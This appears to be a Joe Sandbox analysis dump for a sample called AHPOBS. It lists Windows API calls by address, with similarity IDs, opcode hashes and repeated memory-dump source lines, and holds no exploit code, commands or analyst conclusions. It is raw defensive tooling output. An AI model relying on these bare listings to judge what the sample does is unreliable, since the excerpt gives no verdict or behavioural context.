                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                      • _free.LIBCMT ref: 004170EE
                                      • InterlockedIncrement.KERNEL32(00B317F0), ref: 00417106
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                      • String ID:
                                      • API String ID: 442100245-0
                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                      • _wcslen.LIBCMT ref: 0045F94A
                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                      • String ID: 0
                                      • API String ID: 621800784-4108050209
                                      • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                      • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                      • String ID: \VH
                                      • API String ID: 3884216118-234962358
                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                      • IsMenu.USER32(?), ref: 0044854D
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                      • DrawMenuBar.USER32 ref: 004485AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert
                                      • String ID: 0
                                      • API String ID: 3076010158-4108050209
                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Handle
                                      • String ID: nul
                                      • API String ID: 2519475695-2873401336
                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                      • GetFocus.USER32 ref: 0046157B
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                      • __swprintf.LIBCMT ref: 00461608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                      • String ID: %s%d
                                      • API String ID: 2645982514-1110647743
                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                      APIs
                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                      • String ID:
                                      • API String ID: 3488606520-0
                                      • Opcode ID: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                      • Opcode Fuzzy Hash: 7fd3602cd651dad3c5defef94bf6212d7269dc29ca20ef2dbd8ae2937eb4da43
                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                      APIs
                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$FreeLoad
                                      • String ID:
                                      • API String ID: 2449869053-0
                                      • Opcode ID: 3137254d3866a5329944bd4cd38ed45afe8262ff0536c43391529d0e6cbb617e
                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                      • Opcode Fuzzy Hash: 3137254d3866a5329944bd4cd38ed45afe8262ff0536c43391529d0e6cbb617e
                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004563A6
                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                      • String ID:
                                      • API String ID: 3539004672-0
                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID:
                                      • API String ID: 327565842-0
                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                      • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: RectWindow
                                      • String ID:
                                      • API String ID: 861336768-0
                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                      APIs
                                      • SendMessageW.USER32 ref: 00449598
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                      • _wcslen.LIBCMT ref: 0044960D
                                      • _wcslen.LIBCMT ref: 0044961A
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
